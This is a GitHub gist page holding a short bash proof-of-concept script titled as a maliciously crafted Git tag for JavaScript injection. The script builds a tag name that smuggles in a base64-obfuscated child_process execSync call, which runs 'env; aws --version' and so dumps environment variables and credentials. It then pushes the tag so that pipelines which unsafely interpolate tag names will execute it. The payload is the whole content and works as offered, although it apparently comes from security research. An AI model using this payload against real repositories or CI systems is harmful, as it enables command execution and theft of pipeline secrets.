Skip to content

Instantly share code, notes, and snippets.

@fproulx-boostsecurity
Last active March 15, 2024 19:22
Show Gist options
  • Save fproulx-boostsecurity/90f07cd2987f63901d39b3ec51bea7c7 to your computer and use it in GitHub Desktop.
Save fproulx-boostsecurity/90f07cd2987f63901d39b3ec51bea7c7 to your computer and use it in GitHub Desktop.
Maliciously crafted Git tag (Javascript injection)
#!/bin/bash
#set -x
git commit --allow-empty -m 'New release'
RND_SEMVER="v1.2.$((RANDOM % 1000))"
S2='env; aws --version'
ENC_S2=$(echo -n "$S2" | base64)
S1="'+require('child_process').execSync(atob('$ENC_S2')).toString()+'"
git tag "${RND_SEMVER}${S1}"
FINAL_TAG=$(git describe --tags --exact-match)
git push origin "$FINAL_TAG"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment